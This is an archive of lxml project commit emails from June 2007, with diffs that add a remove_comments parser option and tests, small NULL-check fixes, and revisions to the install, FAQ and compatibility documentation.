src/lxml src/lxml/tests Message-ID: <20070615094750.5094F8290@code0.codespeak.net> Author: scoder Date: Fri Jun 15 11:47:49 2007 New Revision: 44276 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py lxml/branch/lxml-1.3/src/lxml/xslt.pxi Log: some more cleanup and small trunk merges Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 15 11:47:49 2007 @@ -14,9 +14,7 @@ adding processing instructions and comments around the root node * Extended type annotation in objectify: cleaner annotation namespace setup - plus new ``xsiannotate()`` and ``deannotate()`` functions - -* Element.attrib now has a ``pop()`` method + plus new ``deannotate()`` function * Support for custom Element class instantiation in lxml.sax: passing a ``makeelement()`` function to the ElementTreeContentHandler will reuse the @@ -40,7 +38,7 @@ * More ET compatible behaviour when writing out XML declarations or not -* ``Element.attrib`` was missing ``clear()`` method +* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods * More robust error handling in ``iterparse()`` Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Fri Jun 15 11:47:49 2007 @@ -459,6 +459,8 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node is NULL: + return 0 if c_node.type != tree.XML_ELEMENT_NODE: # not an element, only succeed if we match everything return c_name is NULL and c_href is NULL @@ -609,9 +611,9 @@ c = s[0] if c & 0x80: is_non_ascii = 1 - if c == c'\0': + elif c == c'\0': return -1 # invalid! 
- if is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + elif is_non_ascii == 0 and not tree.xmlIsChar_ch(c): return -1 # invalid! s = s + 1 return is_non_ascii Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Fri Jun 15 11:47:49 2007 @@ -381,6 +381,16 @@ keys.sort() self.assertEquals(['alpha', 'beta', 'gamma'], keys) + def test_attribute_items2(self): + XML = self.etree.XML + + root = XML('') + items = root.items() + items.sort() + self.assertEquals( + [('alpha','Alpha'), ('beta','Beta'), ('gamma','Gamma')], + items) + def test_attribute_keys_ns(self): XML = self.etree.XML Modified: lxml/branch/lxml-1.3/src/lxml/xslt.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xslt.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xslt.pxi Fri Jun 15 11:47:49 2007 @@ -3,18 +3,28 @@ cimport xslt class XSLTError(LxmlError): + """Base class of all XSLT errors. + """ pass class XSLTParseError(XSLTError): + """Error parsing a stylesheet document. + """ pass class XSLTApplyError(XSLTError): + """Error running an XSL transformation. + """ pass class XSLTSaveError(XSLTError): + """Error serialising an XSLT result. + """ pass class XSLTExtensionError(XSLTError): + """Error registering an XSLT extension. 
+ """ pass # version information From scoder at codespeak.net Fri Jun 15 11:49:22 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 11:49:22 +0200 (CEST) Subject: [Lxml-checkins] r44277 - lxml/trunk/src/lxml Message-ID: <20070615094922.3FD58827B@code0.codespeak.net> Author: scoder Date: Fri Jun 15 11:49:21 2007 New Revision: 44277 Modified: lxml/trunk/src/lxml/apihelpers.pxi Log: small merge from 1.3 branch: isutf8py() and _tagMatches() Modified: lxml/trunk/src/lxml/apihelpers.pxi ============================================================================== --- lxml/trunk/src/lxml/apihelpers.pxi (original) +++ lxml/trunk/src/lxml/apihelpers.pxi Fri Jun 15 11:49:21 2007 @@ -459,6 +459,11 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node is NULL: + return 0 + if c_node.type != tree.XML_ELEMENT_NODE: + # not an element, only succeed if we match everything + return c_name is NULL and c_href is NULL if c_name is NULL: if c_href is NULL: # always match @@ -606,9 +611,9 @@ c = s[0] if c & 0x80: is_non_ascii = 1 - if c == c'\0': + elif c == c'\0': return -1 # invalid! - if is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + elif is_non_ascii == 0 and not tree.xmlIsChar_ch(c): return -1 # invalid! s = s + 1 return is_non_ascii From scoder at codespeak.net Fri Jun 15 14:41:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 14:41:56 +0200 (CEST) Subject: [Lxml-checkins] r44284 - in lxml/trunk/src/lxml: . 
tests Message-ID: <20070615124156.21AE582B4@code0.codespeak.net> Author: scoder Date: Fri Jun 15 14:41:54 2007 New Revision: 44284 Modified: lxml/trunk/src/lxml/iterparse.pxi lxml/trunk/src/lxml/parser.pxi lxml/trunk/src/lxml/tests/test_etree.py lxml/trunk/src/lxml/xmlparser.pxd Log: added remove_comments keyword argument to parsers to skip over comments Modified: lxml/trunk/src/lxml/iterparse.pxi ============================================================================== --- lxml/trunk/src/lxml/iterparse.pxi (original) +++ lxml/trunk/src/lxml/iterparse.pxi Fri Jun 15 14:41:54 2007 @@ -234,13 +234,15 @@ * load_dtd - use DTD for parsing * no_network - prevent network access * remove_blank_text - discard blank text nodes + * remove_comments - discard comments """ cdef object _source cdef object _filename cdef readonly object root def __init__(self, source, events=("end",), tag=None, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, remove_blank_text=False): + load_dtd=False, no_network=False, remove_blank_text=False, + remove_comments=False): cdef _IterparseContext context cdef char* c_filename cdef int parse_options @@ -257,7 +259,7 @@ c_filename = NULL self._source = source - _BaseParser.__init__(self, _IterparseContext) + _BaseParser.__init__(self, remove_comments, _IterparseContext) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: Modified: lxml/trunk/src/lxml/parser.pxi ============================================================================== --- lxml/trunk/src/lxml/parser.pxi (original) +++ lxml/trunk/src/lxml/parser.pxi Fri Jun 15 14:41:54 2007 @@ -367,7 +367,7 @@ cdef ElementClassLookup _class_lookup cdef python.PyThread_type_lock _parser_lock - def __init__(self, context_class=_ResolverContext): + def __init__(self, remove_comments, context_class=_ResolverContext): cdef xmlParserCtxt* pctxt if isinstance(self, HTMLParser): self._parser_type = LXML_HTML_PARSER @@ -384,8 +384,11 @@ if pctxt is NULL: 
python.PyErr_NoMemory() if pctxt.sax != NULL: + if remove_comments: + pctxt.sax.comment = NULL # hard switch-off for CDATA nodes => makes them plain text pctxt.sax.cdataBlock = NULL + if not config.ENABLE_THREADING or \ self._parser_type == LXML_ITERPARSE_PARSER: # no threading @@ -690,6 +693,7 @@ * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes + * remove_comments - discard comments * compact - safe memory for short text content (default: True) * resolve_entities - replace entities by their text value (default: True) @@ -700,9 +704,9 @@ def __init__(self, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=True, ns_clean=False, recover=False, remove_blank_text=False, compact=True, - resolve_entities=True): + resolve_entities=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: @@ -824,14 +828,15 @@ * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes * compact - safe memory for short text content (default: True) + * remove_comments - discard comments Note that you should avoid sharing parsers between threads for performance reasons. 
""" def __init__(self, recover=True, no_network=True, remove_blank_text=False, - compact=True): + compact=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _HTML_DEFAULT_PARSE_OPTIONS if remove_blank_text: Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Fri Jun 15 14:41:54 2007 @@ -161,6 +161,18 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_parse_remove_comments(self): + parse = self.etree.parse + tostring = self.etree.tostring + XMLParser = self.etree.XMLParser + + f = StringIO('') + parser = XMLParser(remove_comments=True) + tree = parse(f, parser) + self.assertEquals( + '', + tostring(tree)) + def test_parse_parser_type_error(self): # ET raises IOError only parse = self.etree.parse @@ -195,6 +207,30 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_iterparse_comments(self): + # ET removes comments + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f)) + root = events[-1][1] + self.assertEquals(3, len(events)) + self.assertEquals( + '', + tostring(root)) + + def test_iterparse_remove_comments(self): + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f, remove_comments=True)) + root = events[-1][1] + self.assertEquals( + '', + tostring(root)) + def test_iterparse_broken(self): iterparse = self.etree.iterparse f = StringIO('') Modified: lxml/trunk/src/lxml/xmlparser.pxd ============================================================================== --- lxml/trunk/src/lxml/xmlparser.pxd (original) +++ lxml/trunk/src/lxml/xmlparser.pxd Fri Jun 15 14:41:54 2007 @@ -23,6 +23,9 @@ char* value, int len) + ctypedef void (*commentSAXFunc)(void* 
ctx, + char* value) + cdef extern from "libxml/tree.h": ctypedef struct xmlParserInput ctypedef struct xmlParserInputBuffer: @@ -34,6 +37,7 @@ startElementNsSAX2Func startElementNs endElementNsSAX2Func endElementNs cdataBlockSAXFunc cdataBlock + commentSAXFunc comment cdef extern from "libxml/xmlIO.h": cdef xmlParserInputBuffer* xmlAllocParserInputBuffer(int enc) From scoder at codespeak.net Fri Jun 15 14:43:00 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 14:43:00 +0200 (CEST) Subject: [Lxml-checkins] r44285 - lxml/trunk Message-ID: <20070615124300.C4F7382B4@code0.codespeak.net> Author: scoder Date: Fri Jun 15 14:43:00 2007 New Revision: 44285 Modified: lxml/trunk/CHANGES.txt Log: added remove_comments keyword argument to parsers to skip over comments Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Fri Jun 15 14:43:00 2007 @@ -8,6 +8,8 @@ Features added -------------- +* Parsers take a ``remove_comments`` keyword argument that skips over comments + * Entity support through an ``Entity`` factory and element classes. XML parsers now have a ``resolve_entities`` keyword argument that can be set to False to keep entities in the document. 
From scoder at codespeak.net Fri Jun 15 14:46:43 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 14:46:43 +0200 (CEST) Subject: [Lxml-checkins] r44286 - lxml/trunk/src/lxml Message-ID: <20070615124643.43D9F82B6@code0.codespeak.net> Author: scoder Date: Fri Jun 15 14:46:42 2007 New Revision: 44286 Modified: lxml/trunk/src/lxml/parser.pxi Log: cleanup Modified: lxml/trunk/src/lxml/parser.pxi ============================================================================== --- lxml/trunk/src/lxml/parser.pxi (original) +++ lxml/trunk/src/lxml/parser.pxi Fri Jun 15 14:46:42 2007 @@ -827,8 +827,8 @@ * recover - try hard to parse through broken HTML (default: True) * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes - * compact - safe memory for short text content (default: True) * remove_comments - discard comments + * compact - safe memory for short text content (default: True) Note that you should avoid sharing parsers between threads for performance reasons. From scoder at codespeak.net Fri Jun 15 14:49:17 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 14:49:17 +0200 (CEST) Subject: [Lxml-checkins] r44287 - in lxml/branch/lxml-1.3: . 
src/lxml src/lxml/tests Message-ID: <20070615124917.9508882B6@code0.codespeak.net> Author: scoder Date: Fri Jun 15 14:49:16 2007 New Revision: 44287 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/iterparse.pxi lxml/branch/lxml-1.3/src/lxml/parser.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd Log: added remove_comments keyword argument to parsers to skip over comments Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 15 14:49:16 2007 @@ -8,6 +8,8 @@ Features added -------------- +* Parsers take a ``remove_comments`` keyword argument that skips over comments + * ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support Modified: lxml/branch/lxml-1.3/src/lxml/iterparse.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/iterparse.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/iterparse.pxi Fri Jun 15 14:49:16 2007 @@ -234,13 +234,15 @@ * load_dtd - use DTD for parsing * no_network - prevent network access * remove_blank_text - discard blank text nodes + * remove_comments - discard comments """ cdef object _source cdef object _filename cdef readonly object root def __init__(self, source, events=("end",), tag=None, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, remove_blank_text=False): + load_dtd=False, no_network=False, remove_blank_text=False, + remove_comments=False): cdef _IterparseContext context cdef char* c_filename cdef int parse_options @@ -257,7 +259,7 @@ c_filename = NULL self._source = source - _BaseParser.__init__(self, _IterparseContext) + _BaseParser.__init__(self, remove_comments, _IterparseContext) parse_options = 
_XML_DEFAULT_PARSE_OPTIONS if load_dtd: Modified: lxml/branch/lxml-1.3/src/lxml/parser.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/parser.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/parser.pxi Fri Jun 15 14:49:16 2007 @@ -367,7 +367,7 @@ cdef ElementClassLookup _class_lookup cdef python.PyThread_type_lock _parser_lock - def __init__(self, context_class=_ResolverContext): + def __init__(self, remove_comments, context_class=_ResolverContext): cdef xmlParserCtxt* pctxt if isinstance(self, HTMLParser): self._parser_type = LXML_HTML_PARSER @@ -384,8 +384,11 @@ if pctxt is NULL: python.PyErr_NoMemory() if pctxt.sax != NULL: + if remove_comments: + pctxt.sax.comment = NULL # hard switch-off for CDATA nodes => makes them plain text pctxt.sax.cdataBlock = NULL + if not config.ENABLE_THREADING or \ self._parser_type == LXML_ITERPARSE_PARSER: # no threading @@ -664,6 +667,8 @@ * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes + * remove_comments - discard comments + * compact - safe memory for short text content (default: True) Note that you should avoid sharing parsers between threads. While this is not harmful, it is more efficient to use separate parsers. 
This does not @@ -671,9 +676,10 @@ """ def __init__(self, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=False, ns_clean=False, - recover=False, remove_blank_text=False, compact=True): + recover=False, remove_blank_text=False, compact=True, + remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: @@ -789,14 +795,16 @@ * recover - try hard to parse through broken HTML (default: True) * no_network - prevent network access * remove_blank_text - discard empty text nodes + * remove_comments - discard comments + * compact - safe memory for short text content (default: True) Note that you should avoid sharing parsers between threads for performance reasons. """ def __init__(self, recover=True, no_network=False, remove_blank_text=False, - compact=True): + compact=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _HTML_DEFAULT_PARSE_OPTIONS if recover: Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Fri Jun 15 14:49:16 2007 @@ -161,6 +161,18 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_parse_remove_comments(self): + parse = self.etree.parse + tostring = self.etree.tostring + XMLParser = self.etree.XMLParser + + f = StringIO('') + parser = XMLParser(remove_comments=True) + tree = parse(f, parser) + self.assertEquals( + '', + tostring(tree)) + def test_parse_parser_type_error(self): # ET raises IOError only parse = self.etree.parse @@ -191,6 +203,30 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_iterparse_comments(self): + # ET removes comments + iterparse = self.etree.iterparse + tostring = 
self.etree.tostring + + f = StringIO('') + events = list(iterparse(f)) + root = events[-1][1] + self.assertEquals(3, len(events)) + self.assertEquals( + '', + tostring(root)) + + def test_iterparse_remove_comments(self): + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f, remove_comments=True)) + root = events[-1][1] + self.assertEquals( + '', + tostring(root)) + def test_iterparse_broken(self): iterparse = self.etree.iterparse f = StringIO('') Modified: lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd Fri Jun 15 14:49:16 2007 @@ -23,6 +23,9 @@ char* value, int len) + ctypedef void (*commentSAXFunc)(void* ctx, + char* value) + cdef extern from "libxml/tree.h": ctypedef struct xmlParserInput ctypedef struct xmlParserInputBuffer: @@ -34,6 +37,7 @@ startElementNsSAX2Func startElementNs endElementNsSAX2Func endElementNs cdataBlockSAXFunc cdataBlock + commentSAXFunc comment cdef extern from "libxml/xmlIO.h": cdef xmlParserInputBuffer* xmlAllocParserInputBuffer(int enc) From scoder at codespeak.net Fri Jun 15 15:12:47 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 15:12:47 +0200 (CEST) Subject: [Lxml-checkins] r44288 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070615131247.867EF82AE@code0.codespeak.net> Author: scoder Date: Fri Jun 15 15:12:47 2007 New Revision: 44288 Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx Log: read-only support for xsi prefixes in objectify type annotation Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Fri Jun 15 15:12:47 2007 @@ -1011,12 +1011,13 @@ xsi_ns = "{%s}" % 
XML_SCHEMA_INSTANCE_NS pytype_ns = "{%s}" % PYTYPE_NAMESPACE for name, value in cetree.iterattributes(element, 3): - if name == PYTYPE_ATTRIBUTE: - if value == TREE_PYTYPE: - continue - else: - name = name.replace(pytype_ns, 'py:') - name = name.replace(xsi_ns, 'xsi:') + if '{' in name: + if name == PYTYPE_ATTRIBUTE: + if value == TREE_PYTYPE: + continue + else: + name = name.replace(pytype_ns, 'py:') + name = name.replace(xsi_ns, 'xsi:') result = result + "%s * %s = %r\n" % (indentstr, name, value) indent = indent + 1 @@ -1097,6 +1098,9 @@ if value is not None: dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) + if dict_result is NULL and ':' in value: + prefix, value = value.split(':', 1) + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) if dict_result is not NULL: return (dict_result)._type @@ -1516,6 +1520,9 @@ if value is not None: dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) + if dict_result is NULL and ':' in value: + prefix, value = value.split(':', 1) + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) if dict_result is not NULL: pytype = dict_result @@ -1627,7 +1634,9 @@ return _parse(f, parser) cdef object _DEFAULT_NSMAP -_DEFAULT_NSMAP = { "py": PYTYPE_NAMESPACE, "xsi": XML_SCHEMA_INSTANCE_NS } +_DEFAULT_NSMAP = { "py" : PYTYPE_NAMESPACE, + "xsi" : XML_SCHEMA_INSTANCE_NS, + "xsd" : XML_SCHEMA_NS} def Element(_tag, attrib=None, nsmap=None, _pytype=None, **_attributes): """Objectify specific version of the lxml.etree Element() factory that From scoder at codespeak.net Mon Jun 18 10:49:08 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 18 Jun 2007 10:49:08 +0200 (CEST) Subject: [Lxml-checkins] r44328 - in lxml/branch/lxml-1.3: . 
doc Message-ID: <20070618084908.A297A80E5@code0.codespeak.net> Author: scoder Date: Mon Jun 18 10:49:07 2007 New Revision: 44328 Modified: lxml/branch/lxml-1.3/INSTALL.txt lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/compatibility.txt Log: cleanup: install, compatibility, required libs (2.6.20/1.1.15) Modified: lxml/branch/lxml-1.3/INSTALL.txt ============================================================================== --- lxml/branch/lxml-1.3/INSTALL.txt (original) +++ lxml/branch/lxml-1.3/INSTALL.txt Mon Jun 18 10:49:07 2007 @@ -8,10 +8,10 @@ You need libxml2 and libxslt, in particular: -* libxml 2.6.16 or later. It can be found here: +* libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html -* libxslt 1.1.12 or later. It can be found here: +* libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Newer versions generally contain less bugs and are therefore recommended. The @@ -19,30 +19,31 @@ parsing horribly broken HTML. XML Schema support is also still worked on in libxml2, so newer versions will give you better complience with the W3C spec. -For Windows, there is a `binary distribution`_ of libxml2 and libxslt. Note -that you need both libxml2 and libxslt, as well as iconv and zlib. You can -then install the `binary egg distribution`_ of lxml (see below). -.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html -.. _`binary egg distribution`: http://cheeseshop.python.org/pypi/lxml +Installation +------------ -On MacOS-X 10.4, you can use the installed system libraries and the binary egg -distribution of lxml. Note that the libxslt version on this system is older -than the required version above. While there were not any bug reports so far, -you may still encounter certain differences in behaviour in rare cases. - -If you want to build lxml from SVN, you also need Pyrex_. Please read `how to -build lxml from source`_ in this case. 
If you are using a released version of -lxml, it should come with the generated C file in the source distribution, so -no Pyrex is needed in that case. +If you have easy_install_, you can run the following as super-user (or +administrator):: -.. _Pyrex: http://www.cosc.canterbury.ac.nz/~greg/python/Pyrex/ -.. _`how to build lxml from source`: build.html + easy_install lxml + +.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall + +This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as +libxml2 and libxslt are properly installed (including development packages, +i.e. header files etc.). + + +Building lxml from sources +-------------------------- -Note that Pyrex up to and including version 0.9.4 has known problems when -compiling lxml with gcc 4.0 or Python 2.4. Do not use it. If you want to -build lxml from non-release sources, please install Pyrex version 0.9.4.1 or -later. +If you want to build lxml from SVN you should read `how to build lxml from +source`_ (or the file ``build.txt`` in the ``doc`` directory of the source +tree). Both the subversion sources and the source distribution ship with an +adapted version of Pyrex, so you do not need Pyrex installed. + +.. _`how to build lxml from source`: build.html If you have read these instructions and still cannot manage to install lxml, you can check the archives of the `mailing list`_ to see if your problem is @@ -51,16 +52,30 @@ .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev -Installation ------------- +MS Windows +---------- -If you have easy_install_, you can run the following as super-user:: +For MS Windows, the `binary egg distribution of lxml`_ is statically built +against the libraries, i.e. it already includes them. There is no need to +install the external libraries if you use an official lxml build from +cheeseshop. 
+ +If you want to upgrade the libraries and/or compile lxml from sources, you +should install a `binary distribution`_ of libxml2 and libxslt. You need both +libxml2 and libxslt, as well as iconv and zlib. - easy_install lxml +.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html +.. _`binary egg distribution of lxml`: http://cheeseshop.python.org/pypi/lxml -.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall -This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as -libxml2 and libxslt are properly installed. To compile and install lxml -without easy_install, please read `how to build lxml from source`_ (or the -file ``build.txt`` in the ``doc`` directory of the source tree). +MacOS-X +------- + +On MacOS-X 10.4, you can try to use the installed system libraries when you +build lxml yourself. However, the library versions on this system are older +than the required versions, so you may encounter certain differences in +behaviour or even crashes. A number of users reported success with updated +libraries (e.g. using fink_), but needed to set the environment variable +``DYLD_LIBRARY_PATH`` to the directory where fink keeps the libraries. + +.. _fink: http://finkproject.org/ Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Mon Jun 18 10:49:07 2007 @@ -91,7 +91,7 @@ strictly compliant way. As of release 2.4.16, libxml2 passed all 1800+ tests from the OASIS XML Tests Suite. -lxml currently supports libxml2 2.6.16 or later, which has even better support +lxml currently supports libxml2 2.6.20 or later, which has even better support for various XML standards. Some of the more important ones are: HTML, XML namespaces, XPath, XInclude, XSLT, XML catalogs, canonical XML, RelaxNG, XML:ID. 
Support for XML Schema and Schematron is currently incomplete in @@ -105,7 +105,8 @@ It really depends on your application, but the rule of thumb is: more recent versions contain less bugs and provide more features. -* Try to use versions of both libraries that were released together. +* Try to use versions of both libraries that were released together. At least + the libxml2 version should not be older than the libxslt version. * If you use XML Schema or Schematron which are still under development, the most recent version of libxml2 is usually a good bet. @@ -117,10 +118,10 @@ * For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. * For the normal tree handling, however, any libxml2 version starting with - 2.6.16 should do. + 2.6.20 should do. Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to -see if a specific bug has been fixed. +see when (or if) a specific bug has been fixed. .. _`release notes of libxml2`: http://xmlsoft.org/news.html .. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html Modified: lxml/branch/lxml-1.3/doc/compatibility.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/compatibility.txt (original) +++ lxml/branch/lxml-1.3/doc/compatibility.txt Mon Jun 18 10:49:07 2007 @@ -1,3 +1,4 @@ +============================= lxml.etree versus ElementTree ============================= @@ -25,12 +26,8 @@ # use from lxml import etree as ElementTree -* Some minor parts of the API of ElementTree have not yet been implemented and - are thus missing in lxml.etree. Feel free to help out! - -* Then again, lxml.etree offers a lot more functionality, such as - XPath, XSLT, Relax NG, and XML Schema support, which (c)ElementTree - does not offer. +* lxml.etree offers a lot more functionality, such as XPath, XSLT, Relax NG, + and XML Schema support, which (c)ElementTree does not offer. 
* etree has a different idea about Python unicode strings than ElementTree. In most parts of the API, ElementTree uses plain strings and unicode strings @@ -77,32 +74,40 @@ - Unfortunately this is a rather fundamental difference in behavior, which - will be hard to solve. It won't affect some applications, but if you want - to port code you must unfortunately make sure that it doesn't. + Unfortunately this is a rather fundamental difference in behavior, which is + hard to change. It won't affect some applications, but if you want to port + code you must unfortunately make sure that it doesn't affect yours. + +* etree allows navigation to the parent of a node by the ``getparent()`` + method and to the siblings by calling ``getnext()`` and ``getprevious()``. + This is not possible in ElementTree as the underlying tree model does not + have this information. * When trying to set a subelement using __setitem__ that is in fact not an Element but some other object, etree raises a TypeError, and ElementTree raises an AssertionError. This also applies to some other places of the - API. In general, etree tries to avoid AssertionErrors in favour of being + API. In general, etree tries to avoid AssertionErrors in favour of being more specific about the reason for the exception. -* When parsing fails in ``iterparse()``, ElementTree raises an ExpatError - instead of a SyntaxError. lxml.etree follows the other parts of the parser - API and raises an (XML)SyntaxError. +* When parsing fails in ``iterparse()``, ElementTree raises a low-level + ExpatError instead of a SyntaxError as the other parsers. lxml.etree + follows the other parts of the parser API and raises an (XML)SyntaxError. * The ``iterparse()`` function in lxml is implemented based on the libxml2 - parser. This means that modifications of the document root or the ancestors - of the current element during parsing can irritate the parser and even - segfault. 
While this is not a problem in the Python object structure used - by ElementTree, the C tree underlying lxml suffers from it. The golden rule - for ``iterparse()`` on lxml therefore is: do not touch anything that will - have to be touched again by the parser later on. See the lxml API - documentation on this. + parser and tree generator. This means that modifications of the document + root or the ancestors of the current element during parsing can irritate the + parser and even segfault. While this is not a problem in the Python object + structure used by ElementTree, the C tree underlying lxml suffers from it. + The golden rule for ``iterparse()`` on lxml therefore is: do not touch + anything that will have to be touched again by the parser later on. See the + lxml parser documentation on this. * ElementTree ignores comments and processing instructions when parsing XML, while etree will read them in and treat them as Comment or - ProcessingInstruction elements respectively. + ProcessingInstruction elements respectively. This is especially visible + where comments are found inside text content, which is then split by the + Comment element. You can disable this behaviour by passing the boolean + ``remove_comments`` keyword argument to the parser you use. * ElementTree has a bug when serializing an empty Comment (no text argument given) to XML, etree serializes this successfully. @@ -113,18 +118,19 @@ * ElementTree merges the target of a processing instruction into ``PI.text``, while lxml.etree puts it into the ``.target`` property and leaves it out of - the ``.text`` property. + the ``.text`` property. The ``pi.text`` in ElementTree therefore + correspondents to ``pi.target + " " + pi.text`` in lxml.etree. * Because etree is built on top of libxml2, which is namespace prefix aware, etree preserves namespaces declarations and prefixes while ElementTree tends to come up with its own prefixes (ns0, ns1, etc). 
When no namespace prefix - is given however, etree creates ElementTree style prefixes as well. + is given, however, etree creates ElementTree style prefixes as well. * etree has a 'prefix' attribute (read-only) on elements giving the Element's prefix, if this is known, and None otherwise (in case of no namespace at all, or default namespace). - etree further allows passing an 'nsmap' dictionary to the Element and +* etree further allows passing an 'nsmap' dictionary to the Element and SubElement element factories to explicitly map namespace prefixes to namespace URIs. These will be translated into namespace declarations on that element. This means that in the probably rare case that you need to @@ -132,13 +138,9 @@ ElementTree, you cannot pass it as a keyword argument to the Element and SubElement factories directly. -* etree elements can be copied using copy.deepcopy() and copy.copy(), just - like ElementTree's. copy.copy() however does *not* create a shallow copy - where elements are shared between trees, as this makes no sense in the - context of libxml2 trees. Note that lxml can deep-copy trees considerably - faster than ElementTree. - -* etree allows navigation to the parent of a node by the ``getparent()`` - method and to the siblings by calling ``getnext()`` and ``getprevious()``. - This is not possible in ElementTree as the underlying tree model does not - have this information. +* etree elements can be copied using ``copy.deepcopy()`` and ``copy.copy()``, + just like ElementTree's. However, ``copy.copy()`` does *not* create a + shallow copy where elements are shared between trees, as this makes no sense + in the context of libxml2 trees. Note that lxml can 